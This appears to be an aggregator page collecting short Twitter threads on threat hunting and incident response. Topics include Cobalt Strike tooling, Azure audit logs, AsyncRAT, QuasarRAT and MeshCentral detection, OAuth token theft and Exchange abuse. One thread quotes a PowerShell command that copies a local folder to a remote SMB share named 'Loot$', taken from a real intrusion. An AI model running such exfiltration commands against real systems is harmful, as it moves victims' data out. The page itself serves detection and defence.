Discover and read the best of Twitter Threads about #threathunting


With the release of my open-source #CobaltStrike stager decoder (which you can read about here: stairwell.com/news/stairwell…) I thought I'd make a thread showcasing some of the other great open-source tooling out there to help with Cobalt Strike #ThreatHunting and #ThreatIntel 🧵
github.com/RomanEmelyanov…: These are the OG scripts designed for interfacing with Team Servers. Famous for its get_beacon script for milking staged payloads from Team Servers and decrypting them, this GH account also has a script for logging into teamservers and wordlists💀
github.com/JPCERTCC/aa-to… The first Cobalt Strike Beacon configuration extractor that I was aware of, @jpcert_en created a volatility plugin for finding and parsing Beacon configs from memory
Read 8 tweets
1/ #Azure In a recent case, the TA was able to compromise the user despite MFA (MFA fatigue).

After logging in, the attacker registered another mobile number as "Alternate Mobile Phone Call".

In the audit logs, we see this event within "Authentication Methods":

🧵 #DFIR
2/ The audit logs are a goldmine for finding suspicious behavior in an Azure tenant.

If we filter by "Core Directory", "UserManagement" and "Update user" ..
3/ .. we also see the ModifiedProperties (the modifications done by the attacker).

Notice, the primary Phone Number is a Swiss mobile phone (+41), and the attacker added a number from the United Arab Emirates (+971).

Suspicious? You bet!
Read 4 tweets
In the last months, I have collected some awesome new #KQL sources, and this 🧵lists them.
Are you using Defender For Endpoint, Sentinel, Intune or do you want to learn KQL then have a look!
#MDE #Sentinel #Intune #Detection #ThreatHunting
Type: Query
By: @msftsecurity
Link: github.com/Azure/Azure-Se…
Community-based repository for a lot of available data sources in Sentinel. For the E5 detections take a look in the Microsoft 365 Defender Folder.
Type: Query
By: @reprise_99
Link: github.com/reprise99/Sent…
Repository with 100s of KQL queries you can directly use. They are categorized into different Microsoft product categories. You are guaranteed to find useful queries here.
Read 14 tweets
At #IWCON2022, we have 15+ amazing #cybersecurity speakers from around the world 🌍

To share unique methods and findings with y’all 😍🙌

Get ready with your questions. Our experts will answer you live 🔥

Book your ticket: iwcon.live

Meet our speakers 🧵👇
#1 Gabrielle Hempel @gabsmashh, #security engineer @Netwitness 🥳

Her topic: #Threat hunting in #cloud environments 🌩️

Time: 17th Dec, 7:30 pm IST

Want to attend this talk? 😍

Book your ticket here: iwcon.live

#cloudhunting #threathunting
#2 Luke Stephens @hakluke, founder of @haksecio 🔥

His topic: How I used #recon techniques to identify a prolific #scammer 👊

Time: 17th Dec, 6:30 pm IST ❤️

Don't wanna miss it?

Register today: iwcon.live

#infosec #hacking #hackingthehacker
Read 18 tweets
🦖Day 36 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: MacOS[.]System[.]QuarantineEvents

Link: docs.velociraptor.app/artifact_refer…
This artifact parses the 'com[.]apple.LaunchServices.QuarantineEventsV2' sqlite database to provide defenders with information around files that have been downloaded from the internet.

Information includes:

- DL Time
- DL URL
- Origin
- Agent Name/Bundle
- User
- Event UUID
On macOS, when a user downloads a file from the internet/third party source, the file will have an extended attribute associated with it called 'com[.]apple.quarantine'.

This asserts that the file will not be opened/executed, until explicitly allowed by the user (via prompt).
Read 9 tweets
Hey there, today we have something special for you.

Here's a list of SPY/INTELLIGENCE agencies across the world. 🕵️‍♀️🕵🌍🔎

#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT

1. RAW (Research & Analysis Wing), India
Formed: 21 September 1968
2. CIA (Central Intelligence Agency), USA
Formed: September 18, 1947
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
3. Mossad, Israel
Formed: 13 December 1949 (as the Central Institute for Coordination)
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
Read 12 tweets
1/ In a recent compromise, we saw the same multi-layered infection chain that eventually led to AsyncRAT, as described by the ASEC team. [1]

AsyncRAT could not connect to the C2 because the destination port on the firewall was blocked. 🧵

#CyberSecurity
2/ As can be seen in the screenshot above, port 6666 was used, which can be chosen arbitrarily within the builder from AsyncRAT.

3/ Of course, connections within the firewall logs that connect to an IP address on a high port are interesting for #ThreatHunting.

And, even more, connections to a blocked high port.
Read 5 tweets
Hey #OSINT, you might have heard about @spiderfoot, let's try to learn what it does best. #ThreatHunting #threatintelligence #recon #infosec

A thread👇
SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more.
#ThreatHunting #threatintelligence #recon #infosec #OSINT
You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.
#ThreatHunting #threatintelligence #recon #infosec #OSINT
Read 6 tweets
1/ #ThreatHunting: @Avast has blogged how Roshtyak checks the VBAWarnings registry value.

If the value is 1 ("Enable all macros"), then the code will not be executed because it is assumed that this setting is only enabled in a sandbox (or by courageous users). 🧵 #CyberSecurity
2/ "Interestingly, this means that users, who for whatever reason have lowered their security this way, are immune to Roshtyak." [1]
3/ However, this "Enable all macros" value can also be explicitly set for Outlook

(Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook - Level = 1).

If this value is set to 1 in a user context, a nifty persistence within Outlook may have been set up by a TA.
Read 7 tweets
1/ #ThreatHunting: Normal users (not developers) who have Python in their Music (!) directory? This screams TA 😅

In an investigation on a breached network, we discovered the following directory:

C:\Users\<user>\Music\WPy64-39100\python-3.9.10.amdMusic\WPy64-39100
2/ The funny thing is that the TA appended "Music" to the ordinary directory name "python-3.9.10.amd64" to make it look more legitimate?

In several directories, we found attack scripts (written in Python), including noPac.py

(github.com/Ridter/noPac)
3/ And the whole impacket suite.

(github.com/SecureAuthCorp…)

Monitoring or creating a baseline (which users are using Python) could be helpful here, or just monitoring from which paths Python is started (like in our example from the Music directory).
Read 5 tweets
1/ #ThreatHunting:

In a compromised network, the TA used PCHunter on different systems to disable the local AV (or at least tried it).

In the web requests recorded on the firewall, we found traces of the download:
www.epoolsoft[.]com/pchunter/pchunter_free

🧵 #CyberSecurity
2/ @CrowdStrike also mentioned PCHunter in the latest ThreatHunting report, along with GMER.

go.crowdstrike.com/rs/281-OBQ-266…
3/ I have tweeted about two of these tools (PCHunter / GMER) before, and we also see these two products regularly in our IR cases.

Read 4 tweets
1/ #ThreatHunting:

In a compromised network, we saw the following request in the proxy logs:

www.advanced-ip-scanner[.]com/checkupdate.php?[..]

This scanner is trendy among ransomware groups and has been mentioned in reports by @TheDFIRReport, among others. [1] 🧵
2/ This HTTP request can now be used very well for an alert.

Or better, collect and monitor all your DNS logs, because a DNS request will still go out if the Advanced IP Scanner is run without an installation (portable version).

An excellent opportunity for detection.
3/ You can see the DNS request for the domain www.advanced-ip-scanner[.]com below.
Read 4 tweets
1/ #ThreatHunting

Another one for the people who monitor PowerShell logs or command lines:

Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse

This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
2/ Of course, outgoing SMB traffic must be allowed on the firewall(s).

#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:

Copy-Item -Path "C:\Temp\" -Destination "\\142.93.X.X\c$"
3/ On our specified endpoint on the Internet (with the -Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):

# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
Read 4 tweets
A list of top 10 popular malware reports that every Malware Analyst should check out

Take a look at these excellent Malware analysis reports

#malware #ThreatHunting #threatintelligence #fireye #virus #Talos @TalosSecurity #linux #hacking #networks #rootkits

👇👇
1⃣ CheckPoint - SpeakUp: A New Undetected Backdoor Linux Trojan

🔗
research.checkpoint.com/2019/speakup-a…
2⃣ First Sednit UEFI Rootkit unveiled

🔗
mirror.netcologne.de/CCC/congress/2…
Read 11 tweets
1\ #ThreatHunting: Detecting OAuth Token Theft in Azure / M365

This technique is STILL being abused by Chinese APT groups. This blog covers several methods of detecting this technique😈.

It's also a good reminder to always perform browser forensics ;)

inversecos.com/2022/08/how-to…
2\ METHOD 1: Look for the OAuth redirect consent link in browser history and/or proxy logs.

Take note of the following fields:
- client_id (malicious app id)
- redirect_uri (malicious domain)
- scope (API permissions requested)
3\ Review permissions requested in the scope field (I'll show you where else to find these permissions in the logs).

Take note of these:
- User.Read
- User.ReadWrite
- User.ReadWrite.All
- Mail.ReadWrite
- Calendars.ReadWrite
- Files.ReadWrite
- User.Export.All
Read 6 tweets
1/ #ThreatHunting:

#QuasarRAT is another RAT we see from time to time in our IR cases and was also used against NATO facilities in March. [1]

We can hunt for

1⃣ The default port within the FW logs
2⃣ Mutexes
3⃣ User-Agent
4⃣ Persistence mechanisms

🧵
2/ @qualys has published an excellent paper ("Stealthy Quasar Evolving to Lead the RAT Race") about Quasar, where the whole builder and much more are described in detail. [2]
3/ In the client builder (which creates an executable which is used for the infection), the default port is pre-configured to 4782.
Read 12 tweets
1/ #ThreatHunting

MeshCentral is another remote admin software installed by TAs we have seen in our IR cases [1].

Following is a brief introduction to the software and what forensic traces MeshCentral leaves on the network and the hosts. 🧵

#CyberSecurity
2/ For our tests, we use the hosted instance of MeshCentral.com, but the management software can also be run on a separate server, controlled by the TA.

After logging into the panel, we can download an agent for different operating systems (Windows, Mac, Linux).
3/ Before the installation or execution of the agent, the server URL is displayed under "Connection Details".

In our example, the agent connects to meshcentral.com, but another domain can be configured when the management server is self-hosted.
Read 19 tweets
1/ #ThreatHunting for #AsyncRAT

We have various ways to find infected hosts with AsyncRAT:

1⃣ Usage of standard C2 ports
2⃣ Hunting for persistence
3⃣ Mutexes FTW
4⃣ Last but not least, hunting for dropped DLLs

Let's go 🤠🧵

#CyberSecurity
2/ AsyncRAT is a popular Trojan executed at the end of an infection chain on target computers.

@hpsecurity ([2],[3]) and @Trellix ([4]) have both reported in recent reports that TAs have been deploying AsyncRAT.
3/ Since the source code of AsyncRAT is publicly available [1], we can obtain a copy to investigate and build detection capabilities for this RAT.
Read 25 tweets
🔔I published a new script to parse the log of #AppLocker🔒, which I called Get-AppLockerEventlog.ps1

It compiles all the useful data needed in #threathunting and #DFIR

You can find the script and the documentation here:
👉github.com/RomaissaAdjail…
2/ Also, you can save the output as a CSV.
3/ It comes with 04 cases (block, all, allow, audit)
Read 3 tweets
1/ Windows Error Reporting (WER) can provide investigators with a wealth of data including:
• SHA1 hashes of crashed processes
• Snapshot of process trees at time of crash
• Loaded modules of crash
• Process minidumps
#DFIR #Threathunting
See 🧵 for new #Velociraptor artefact
2/ WER files are found in the following locations. They include a range of information typically used to address an application crash; however, we can use it for investigation!

C:/Users/*/AppData/Local/Microsoft/Windows/WER
C:/ProgramData/Microsoft/Windows/WER
3/ The "Report.wer" file includes binary information and the binary path. In Windows 10 and above, the field "TaskAppId" contains the SHA1 hash of the process (similar to Amcache).
Read 9 tweets
1/ Although Windows logs the creation of new services in the SYSTEM event log (Event ID 7045 - New Service was installed), attackers often delete these logs.

But we can use the Windows Firewall event logs for #ThreatHunting new installations (of backdoors) 🧵

#CyberSecurity
2/ The screenshot above shows the 2004 Event ID (the creation of a new firewall rule).

The screenshot is from an actual case where the attacker installed Splashtop as a backdoor (among others) to get back into the network.
3/ Using @velocidex Velociraptor and the EvtxHunter Hunt, we can conveniently collect these event logs on all clients and servers in the network.
Read 6 tweets
1\ #ThreatHunting for APT abuse of Exchange

APT Exchange abuse has been a common theme with techniques ranging from:
> Compiled DLL OWA backdoors
> .req webshells
> EWS / Legacy auth abuse
> Log / File deletion

TL;DR below or check out the full blog 👇👇
inversecos.com/2022/07/huntin…
2\ EWS and other legacy auth is commonly abused by APT groups (when enabled).

Check MSExchange Management.evtx log for EWS abuse.

Look for cmdlets like (more cmdlets in blog)
> New-MailboxExportRequest
> Remove-MailboxExportRequest
> Search-Mailbox
> Set-Mailbox
3\ Hunt IIS logs in Exchange for:
> Exploitation of unpatched vuln
> Webshell/owa backdoors being used
> Exfil

I've noted across engagements this happens in chunks via several extensions (7Z, TAR, RAR, PST, OST, CAB, ZIP). APTs will use several diff file types on one engagement
Read 9 tweets
Are you using any of the Microsoft Security products and/or #Sentinel? Then this thread is for you! The best resources for #KQL Advanced Hunting Queries or Analytics rules in my opinion.
#MDE #ThreatHunting #Detection #DFIR
github.com/reprise99/Sent… by @reprise_99. Awesome source! With the #365daysofkql series a lot of useful queries have been added. The queries are categorized by the different Microsoft products.
github.com/Azure/Azure-Se… by @msftsecurity. A lot of KQL queries can be found here, all of which are categorised on the basis of @MITREattack tactics.
Read 8 tweets